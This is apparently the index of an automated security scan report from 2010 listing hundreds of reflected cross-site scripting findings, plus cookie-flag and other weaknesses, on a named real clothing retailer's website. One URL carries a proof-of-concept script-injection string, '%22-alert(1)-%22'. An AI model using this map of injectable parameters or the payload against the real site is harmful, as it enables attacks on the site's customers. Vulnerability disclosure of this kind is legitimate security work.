Report generated by Hoyt LLC Research at Tue Nov 09 18:42:29 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


1. Cross-site scripting (reflected)

1.1. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 1]

1.2. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 2]

1.3. http://www.fredperry.com/aboutus/careers/ [name of an arbitrarily supplied request parameter]

1.4. http://www.fredperry.com/aboutus/security/ [REST URL parameter 1]

1.5. http://www.fredperry.com/aboutus/security/ [REST URL parameter 2]

1.6. http://www.fredperry.com/aboutus/security/ [name of an arbitrarily supplied request parameter]

1.7. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 1]

1.8. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 2]

1.9. http://www.fredperry.com/aboutus/terms/ [name of an arbitrarily supplied request parameter]

1.10. http://www.fredperry.com/accessories/ [REST URL parameter 1]

1.11. http://www.fredperry.com/accessories/ [name of an arbitrarily supplied request parameter]

1.12. http://www.fredperry.com/accessories/men/ [REST URL parameter 1]

1.13. http://www.fredperry.com/accessories/men/ [REST URL parameter 2]

1.14. http://www.fredperry.com/accessories/men/ [name of an arbitrarily supplied request parameter]

1.15. http://www.fredperry.com/accessories/women/ [REST URL parameter 1]

1.16. http://www.fredperry.com/accessories/women/ [REST URL parameter 2]

1.17. http://www.fredperry.com/accessories/women/ [name of an arbitrarily supplied request parameter]

1.18. http://www.fredperry.com/arcade/ [REST URL parameter 1]

1.19. http://www.fredperry.com/arcade/ [name of an arbitrarily supplied request parameter]

1.20. http://www.fredperry.com/bags/ [REST URL parameter 1]

1.21. http://www.fredperry.com/bags/ [name of an arbitrarily supplied request parameter]

1.22. http://www.fredperry.com/bags/men/ [REST URL parameter 1]

1.23. http://www.fredperry.com/bags/men/ [REST URL parameter 2]

1.24. http://www.fredperry.com/bags/men/ [name of an arbitrarily supplied request parameter]

1.25. http://www.fredperry.com/bags/women/ [REST URL parameter 1]

1.26. http://www.fredperry.com/bags/women/ [REST URL parameter 2]

1.27. http://www.fredperry.com/bags/women/ [name of an arbitrarily supplied request parameter]

1.28. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 1]

1.29. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 2]

1.30. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 3]

1.31. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 1]

1.32. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 2]

1.33. http://www.fredperry.com/checkout/cart/ [REST URL parameter 1]

1.34. http://www.fredperry.com/checkout/cart/ [REST URL parameter 2]

1.35. http://www.fredperry.com/checkout/cart/ [name of an arbitrarily supplied request parameter]

1.36. http://www.fredperry.com/contacts/ [REST URL parameter 1]

1.37. http://www.fredperry.com/contacts/ [name of an arbitrarily supplied request parameter]

1.38. http://www.fredperry.com/customercare/ [REST URL parameter 1]

1.39. http://www.fredperry.com/customercare/ [name of an arbitrarily supplied request parameter]

1.40. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 1]

1.41. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 2]

1.42. http://www.fredperry.com/customercare/delivery/ [name of an arbitrarily supplied request parameter]

1.43. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 1]

1.44. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 2]

1.45. http://www.fredperry.com/customercare/deliverylate/ [name of an arbitrarily supplied request parameter]

1.46. http://www.fredperry.com/customercare/faq/ [REST URL parameter 1]

1.47. http://www.fredperry.com/customercare/faq/ [REST URL parameter 2]

1.48. http://www.fredperry.com/customercare/faq/ [name of an arbitrarily supplied request parameter]

1.49. http://www.fredperry.com/customercare/information/ [REST URL parameter 1]

1.50. http://www.fredperry.com/customercare/information/ [REST URL parameter 2]

1.51. http://www.fredperry.com/customercare/information/ [name of an arbitrarily supplied request parameter]

1.52. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 1]

1.53. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 2]

1.54. http://www.fredperry.com/customercare/ordertracking/ [name of an arbitrarily supplied request parameter]

1.55. http://www.fredperry.com/customercare/returns/ [REST URL parameter 1]

1.56. http://www.fredperry.com/customercare/returns/ [REST URL parameter 2]

1.57. http://www.fredperry.com/customercare/returns/ [name of an arbitrarily supplied request parameter]

1.58. http://www.fredperry.com/footwear/ [REST URL parameter 1]

1.59. http://www.fredperry.com/footwear/ [name of an arbitrarily supplied request parameter]

1.60. http://www.fredperry.com/footwear/men/ [REST URL parameter 1]

1.61. http://www.fredperry.com/footwear/men/ [REST URL parameter 2]

1.62. http://www.fredperry.com/footwear/men/ [name of an arbitrarily supplied request parameter]

1.63. http://www.fredperry.com/footwear/women/ [REST URL parameter 1]

1.64. http://www.fredperry.com/footwear/women/ [REST URL parameter 2]

1.65. http://www.fredperry.com/footwear/women/ [name of an arbitrarily supplied request parameter]

1.66. http://www.fredperry.com/heritage/ [REST URL parameter 1]

1.67. http://www.fredperry.com/heritage/ [name of an arbitrarily supplied request parameter]

1.68. http://www.fredperry.com/home/ [REST URL parameter 1]

1.69. http://www.fredperry.com/home/ [name of an arbitrarily supplied request parameter]

1.70. http://www.fredperry.com/js/index.php [REST URL parameter 1]

1.71. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 1]

1.72. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 2]

1.73. http://www.fredperry.com/kids/kidswear/ [name of an arbitrarily supplied request parameter]

1.74. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 1]

1.75. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 2]

1.76. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [name of an arbitrarily supplied request parameter]

1.77. http://www.fredperry.com/limited-edition/ [REST URL parameter 1]

1.78. http://www.fredperry.com/limited-edition/ [name of an arbitrarily supplied request parameter]

1.79. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 1]

1.80. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 2]

1.81. http://www.fredperry.com/limited-edition/men/ [name of an arbitrarily supplied request parameter]

1.82. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 1]

1.83. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 2]

1.84. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 3]

1.85. http://www.fredperry.com/limited-edition/men/accessories/ [name of an arbitrarily supplied request parameter]

1.86. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 1]

1.87. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 2]

1.88. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 3]

1.89. http://www.fredperry.com/limited-edition/men/bags/ [name of an arbitrarily supplied request parameter]

1.90. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 1]

1.91. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 2]

1.92. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 3]

1.93. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [name of an arbitrarily supplied request parameter]

1.94. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 1]

1.95. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 2]

1.96. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 3]

1.97. http://www.fredperry.com/limited-edition/men/british-collectables/ [name of an arbitrarily supplied request parameter]

1.98. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 1]

1.99. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 2]

1.100. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 3]

1.101. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [name of an arbitrarily supplied request parameter]

1.102. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 1]

1.103. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 2]

1.104. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 3]

1.105. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [SID parameter]

1.106. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [name of an arbitrarily supplied request parameter]

1.107. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 1]

1.108. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 2]

1.109. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 3]

1.110. http://www.fredperry.com/limited-edition/men/footwear/ [name of an arbitrarily supplied request parameter]

1.111. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 1]

1.112. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 2]

1.113. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 3]

1.114. http://www.fredperry.com/limited-edition/men/jackets/ [name of an arbitrarily supplied request parameter]

1.115. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 1]

1.116. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 2]

1.117. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 3]

1.118. http://www.fredperry.com/limited-edition/men/knitwear/ [name of an arbitrarily supplied request parameter]

1.119. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 1]

1.120. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 2]

1.121. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 3]

1.122. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [name of an arbitrarily supplied request parameter]

1.123. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 1]

1.124. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 2]

1.125. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 3]

1.126. http://www.fredperry.com/limited-edition/men/new-styles/ [name of an arbitrarily supplied request parameter]

1.127. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 1]

1.128. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 2]

1.129. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 3]

1.130. http://www.fredperry.com/limited-edition/men/shirts/ [name of an arbitrarily supplied request parameter]

1.131. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 1]

1.132. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 2]

1.133. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 3]

1.134. http://www.fredperry.com/limited-edition/men/shorts/ [name of an arbitrarily supplied request parameter]

1.135. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 1]

1.136. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 2]

1.137. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 3]

1.138. http://www.fredperry.com/limited-edition/men/trousers/ [name of an arbitrarily supplied request parameter]

1.139. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 1]

1.140. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 2]

1.141. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 3]

1.142. http://www.fredperry.com/limited-edition/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.143. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 1]

1.144. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 2]

1.145. http://www.fredperry.com/limited-edition/women/ [name of an arbitrarily supplied request parameter]

1.146. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 1]

1.147. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 2]

1.148. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 3]

1.149. http://www.fredperry.com/limited-edition/women/accessories/ [name of an arbitrarily supplied request parameter]

1.150. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 1]

1.151. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 2]

1.152. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 3]

1.153. http://www.fredperry.com/limited-edition/women/bags/ [name of an arbitrarily supplied request parameter]

1.154. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 1]

1.155. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 2]

1.156. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 3]

1.157. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [name of an arbitrarily supplied request parameter]

1.158. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 1]

1.159. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 2]

1.160. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 3]

1.161. http://www.fredperry.com/limited-edition/women/collaboration/ [name of an arbitrarily supplied request parameter]

1.162. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 1]

1.163. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 2]

1.164. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 3]

1.165. http://www.fredperry.com/limited-edition/women/dresses/ [name of an arbitrarily supplied request parameter]

1.166. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 1]

1.167. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 2]

1.168. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 3]

1.169. http://www.fredperry.com/limited-edition/women/footwear/ [name of an arbitrarily supplied request parameter]

1.170. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 1]

1.171. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 2]

1.172. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 3]

1.173. http://www.fredperry.com/limited-edition/women/jackets/ [name of an arbitrarily supplied request parameter]

1.174. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 1]

1.175. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 2]

1.176. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 3]

1.177. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [name of an arbitrarily supplied request parameter]

1.178. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 1]

1.179. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 2]

1.180. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 3]

1.181. http://www.fredperry.com/limited-edition/women/knitwear/ [name of an arbitrarily supplied request parameter]

1.182. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 1]

1.183. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 2]

1.184. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 3]

1.185. http://www.fredperry.com/limited-edition/women/new-styles/ [name of an arbitrarily supplied request parameter]

1.186. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 1]

1.187. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 2]

1.188. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 3]

1.189. http://www.fredperry.com/limited-edition/women/shirts/ [name of an arbitrarily supplied request parameter]

1.190. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 1]

1.191. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 2]

1.192. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 3]

1.193. http://www.fredperry.com/limited-edition/women/shorts/ [name of an arbitrarily supplied request parameter]

1.194. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 1]

1.195. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 2]

1.196. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 3]

1.197. http://www.fredperry.com/limited-edition/women/skirts/ [name of an arbitrarily supplied request parameter]

1.198. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 1]

1.199. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 2]

1.200. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 3]

1.201. http://www.fredperry.com/limited-edition/women/trousers/ [name of an arbitrarily supplied request parameter]

1.202. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 1]

1.203. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 2]

1.204. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 3]

1.205. http://www.fredperry.com/limited-edition/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.206. http://www.fredperry.com/men/ [REST URL parameter 1]

1.207. http://www.fredperry.com/men/ [name of an arbitrarily supplied request parameter]

1.208. http://www.fredperry.com/men/jackets/ [REST URL parameter 1]

1.209. http://www.fredperry.com/men/jackets/ [REST URL parameter 2]

1.210. http://www.fredperry.com/men/jackets/ [name of an arbitrarily supplied request parameter]

1.211. http://www.fredperry.com/men/knitwear/ [REST URL parameter 1]

1.212. http://www.fredperry.com/men/knitwear/ [REST URL parameter 2]

1.213. http://www.fredperry.com/men/knitwear/ [name of an arbitrarily supplied request parameter]

1.214. http://www.fredperry.com/men/shirts/ [REST URL parameter 1]

1.215. http://www.fredperry.com/men/shirts/ [REST URL parameter 2]

1.216. http://www.fredperry.com/men/shirts/ [name of an arbitrarily supplied request parameter]

1.217. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 1]

1.218. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 2]

1.219. http://www.fredperry.com/men/t-shirts/ [name of an arbitrarily supplied request parameter]

1.220. http://www.fredperry.com/men/tennis/ [REST URL parameter 1]

1.221. http://www.fredperry.com/men/tennis/ [REST URL parameter 2]

1.222. http://www.fredperry.com/men/tennis/ [name of an arbitrarily supplied request parameter]

1.223. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 1]

1.224. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 2]

1.225. http://www.fredperry.com/men/track-jackets/ [name of an arbitrarily supplied request parameter]

1.226. http://www.fredperry.com/men/trousers/ [REST URL parameter 1]

1.227. http://www.fredperry.com/men/trousers/ [REST URL parameter 2]

1.228. http://www.fredperry.com/men/trousers/ [name of an arbitrarily supplied request parameter]

1.229. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 1]

1.230. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 2]

1.231. http://www.fredperry.com/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.232. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 1]

1.233. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 2]

1.234. http://www.fredperry.com/productinfo/clothingsizes/ [name of an arbitrarily supplied request parameter]

1.235. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 1]

1.236. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 2]

1.237. http://www.fredperry.com/productinfo/footwearsizes/ [name of an arbitrarily supplied request parameter]

1.238. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 1]

1.239. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 2]

1.240. http://www.fredperry.com/productinfo/garmentcare/ [name of an arbitrarily supplied request parameter]

1.241. http://www.fredperry.com/sale/ [REST URL parameter 1]

1.242. http://www.fredperry.com/sale/ [name of an arbitrarily supplied request parameter]

1.243. http://www.fredperry.com/shops/ [REST URL parameter 1]

1.244. http://www.fredperry.com/shops/ [name of an arbitrarily supplied request parameter]

1.245. http://www.fredperry.com/site-map/ [REST URL parameter 1]

1.246. http://www.fredperry.com/site-map/ [name of an arbitrarily supplied request parameter]

1.247. http://www.fredperry.com/women/ [REST URL parameter 1]

1.248. http://www.fredperry.com/women/ [name of an arbitrarily supplied request parameter]

1.249. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 1]

1.250. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 2]

1.251. http://www.fredperry.com/women/amy-winehouse-landing/ [name of an arbitrarily supplied request parameter]

1.252. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 1]

1.253. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 2]

1.254. http://www.fredperry.com/women/amy-winehouse/ [name of an arbitrarily supplied request parameter]

1.255. http://www.fredperry.com/women/dresses/ [REST URL parameter 1]

1.256. http://www.fredperry.com/women/dresses/ [REST URL parameter 2]

1.257. http://www.fredperry.com/women/dresses/ [name of an arbitrarily supplied request parameter]

1.258. http://www.fredperry.com/women/jackets/ [REST URL parameter 1]

1.259. http://www.fredperry.com/women/jackets/ [REST URL parameter 2]

1.260. http://www.fredperry.com/women/jackets/ [name of an arbitrarily supplied request parameter]

1.261. http://www.fredperry.com/women/knitwear/ [REST URL parameter 1]

1.262. http://www.fredperry.com/women/knitwear/ [REST URL parameter 2]

1.263. http://www.fredperry.com/women/knitwear/ [name of an arbitrarily supplied request parameter]

1.264. http://www.fredperry.com/women/shirts/ [REST URL parameter 1]

1.265. http://www.fredperry.com/women/shirts/ [REST URL parameter 2]

1.266. http://www.fredperry.com/women/shirts/ [name of an arbitrarily supplied request parameter]

1.267. http://www.fredperry.com/women/skirts/ [REST URL parameter 1]

1.268. http://www.fredperry.com/women/skirts/ [REST URL parameter 2]

1.269. http://www.fredperry.com/women/skirts/ [name of an arbitrarily supplied request parameter]

1.270. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 1]

1.271. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 2]

1.272. http://www.fredperry.com/women/t-shirts/ [name of an arbitrarily supplied request parameter]

1.273. http://www.fredperry.com/women/tennis/ [REST URL parameter 1]

1.274. http://www.fredperry.com/women/tennis/ [REST URL parameter 2]

1.275. http://www.fredperry.com/women/tennis/ [name of an arbitrarily supplied request parameter]

1.276. http://www.fredperry.com/women/trousers/ [REST URL parameter 1]

1.277. http://www.fredperry.com/women/trousers/ [REST URL parameter 2]

1.278. http://www.fredperry.com/women/trousers/ [name of an arbitrarily supplied request parameter]

1.279. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 1]

1.280. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 2]

1.281. http://www.fredperry.com/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.282. https://www.fredperry.com/customer/account/ [REST URL parameter 1]

1.283. https://www.fredperry.com/customer/account/ [REST URL parameter 2]

1.284. https://www.fredperry.com/customer/account/login/ [REST URL parameter 1]

1.285. https://www.fredperry.com/customer/account/login/ [REST URL parameter 2]

1.286. https://www.fredperry.com/customer/account/login/ [REST URL parameter 3]

1.287. https://www.fredperry.com/customer/account/login/ [name of an arbitrarily supplied request parameter]

1.288. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/ [name of an arbitrarily supplied request parameter]

1.289. https://www.fredperry.com/sales/order/history/ [REST URL parameter 1]

1.290. https://www.fredperry.com/sales/order/history/ [REST URL parameter 2]

1.291. https://www.fredperry.com/sales/order/history/ [REST URL parameter 3]

2. Password field with autocomplete enabled

3. SSL cookie without secure flag set

3.1. https://www.fredperry.com/customer/account/

3.2. https://www.fredperry.com/customer/account/login/

3.3. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

3.4. https://www.fredperry.com/sales/order/history/

4. Cross-domain Referer leakage

5. Cross-domain script include

6. Cookie without HttpOnly flag set

6.1. http://www.fredperry.com/aboutus/careers/

6.2. http://www.fredperry.com/aboutus/security/

6.3. http://www.fredperry.com/aboutus/terms/

6.4. http://www.fredperry.com/accessories/

6.5. http://www.fredperry.com/accessories/men/

6.6. http://www.fredperry.com/accessories/women/

6.7. http://www.fredperry.com/arcade/

6.8. http://www.fredperry.com/bags/

6.9. http://www.fredperry.com/bags/men/

6.10. http://www.fredperry.com/bags/women/

6.11. http://www.fredperry.com/catalogsearch/ajax/suggest/

6.12. http://www.fredperry.com/catalogsearch/result/

6.13. http://www.fredperry.com/checkout/cart/

6.14. http://www.fredperry.com/contacts/

6.15. http://www.fredperry.com/customercare/

6.16. http://www.fredperry.com/customercare/delivery/

6.17. http://www.fredperry.com/customercare/deliverylate/

6.18. http://www.fredperry.com/customercare/faq/

6.19. http://www.fredperry.com/customercare/information/

6.20. http://www.fredperry.com/customercare/ordertracking/

6.21. http://www.fredperry.com/customercare/returns/

6.22. http://www.fredperry.com/footwear/

6.23. http://www.fredperry.com/footwear/men/

6.24. http://www.fredperry.com/footwear/women/

6.25. http://www.fredperry.com/heritage/

6.26. http://www.fredperry.com/home/

6.27. http://www.fredperry.com/js/index.php

6.28. http://www.fredperry.com/kids/kidswear/

6.29. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/

6.30. http://www.fredperry.com/limited-edition/

6.31. http://www.fredperry.com/limited-edition/men/

6.32. http://www.fredperry.com/limited-edition/men/accessories/

6.33. http://www.fredperry.com/limited-edition/men/bags/

6.34. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/

6.35. http://www.fredperry.com/limited-edition/men/british-collectables/

6.36. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/

6.37. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/

6.38. http://www.fredperry.com/limited-edition/men/footwear/

6.39. http://www.fredperry.com/limited-edition/men/jackets/

6.40. http://www.fredperry.com/limited-edition/men/knitwear/

6.41. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/

6.42. http://www.fredperry.com/limited-edition/men/new-styles/

6.43. http://www.fredperry.com/limited-edition/men/shirts/

6.44. http://www.fredperry.com/limited-edition/men/shorts/

6.45. http://www.fredperry.com/limited-edition/men/trousers/

6.46. http://www.fredperry.com/limited-edition/men/woven-shirts/

6.47. http://www.fredperry.com/limited-edition/women/

6.48. http://www.fredperry.com/limited-edition/women/accessories/

6.49. http://www.fredperry.com/limited-edition/women/bags/

6.50. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/

6.51. http://www.fredperry.com/limited-edition/women/collaboration/

6.52. http://www.fredperry.com/limited-edition/women/dresses/

6.53. http://www.fredperry.com/limited-edition/women/footwear/

6.54. http://www.fredperry.com/limited-edition/women/jackets/

6.55. http://www.fredperry.com/limited-edition/women/jessica-ogden/

6.56. http://www.fredperry.com/limited-edition/women/knitwear/

6.57. http://www.fredperry.com/limited-edition/women/new-styles/

6.58. http://www.fredperry.com/limited-edition/women/shirts/

6.59. http://www.fredperry.com/limited-edition/women/shorts/

6.60. http://www.fredperry.com/limited-edition/women/skirts/

6.61. http://www.fredperry.com/limited-edition/women/trousers/

6.62. http://www.fredperry.com/limited-edition/women/woven-shirts/

6.63. http://www.fredperry.com/men/

6.64. http://www.fredperry.com/men/jackets/

6.65. http://www.fredperry.com/men/knitwear/

6.66. http://www.fredperry.com/men/shirts/

6.67. http://www.fredperry.com/men/t-shirts/

6.68. http://www.fredperry.com/men/tennis/

6.69. http://www.fredperry.com/men/track-jackets/

6.70. http://www.fredperry.com/men/trousers/

6.71. http://www.fredperry.com/men/woven-shirts/

6.72. http://www.fredperry.com/productinfo/clothingsizes/

6.73. http://www.fredperry.com/productinfo/footwearsizes/

6.74. http://www.fredperry.com/productinfo/garmentcare/

6.75. http://www.fredperry.com/sale/

6.76. http://www.fredperry.com/shops/

6.77. http://www.fredperry.com/site-map/

6.78. http://www.fredperry.com/skin/frontend/default/default/css/catalogue.css

6.79. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

6.80. http://www.fredperry.com/skin/frontend/default/default/css/fp_style.css

6.81. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

6.82. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

6.83. http://www.fredperry.com/skin/frontend/default/default/css/gs_reset.css

6.84. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

6.85. http://www.fredperry.com/skin/frontend/default/default/css/payment.css

6.86. http://www.fredperry.com/skin/frontend/default/default/css/print.css

6.87. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

6.88. http://www.fredperry.com/women/

6.89. http://www.fredperry.com/women/amy-winehouse-landing/

6.90. http://www.fredperry.com/women/amy-winehouse/

6.91. http://www.fredperry.com/women/dresses/

6.92. http://www.fredperry.com/women/jackets/

6.93. http://www.fredperry.com/women/knitwear/

6.94. http://www.fredperry.com/women/shirts/

6.95. http://www.fredperry.com/women/skirts/

6.96. http://www.fredperry.com/women/t-shirts/

6.97. http://www.fredperry.com/women/tennis/

6.98. http://www.fredperry.com/women/trousers/

6.99. http://www.fredperry.com/women/woven-shirts/

6.100. https://www.fredperry.com/customer/account/

6.101. https://www.fredperry.com/customer/account/login/

6.102. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

6.103. https://www.fredperry.com/sales/order/history/

7. Email addresses disclosed

7.1. http://www.fredperry.com/aboutus/careers/

7.2. http://www.fredperry.com/customercare/deliverylate/

7.3. http://www.fredperry.com/customercare/faq/

7.4. http://www.fredperry.com/customercare/returns/

7.5. http://www.fredperry.com/js/index.php

7.6. http://www.fredperry.com/shops/

7.7. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

7.8. http://www.fredperry.com/skin/frontend/default/default/css/print.css

7.9. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

7.10. https://www.fredperry.com/js/index.php

7.11. https://www.fredperry.com/skin/frontend/default/default/css/clears.css

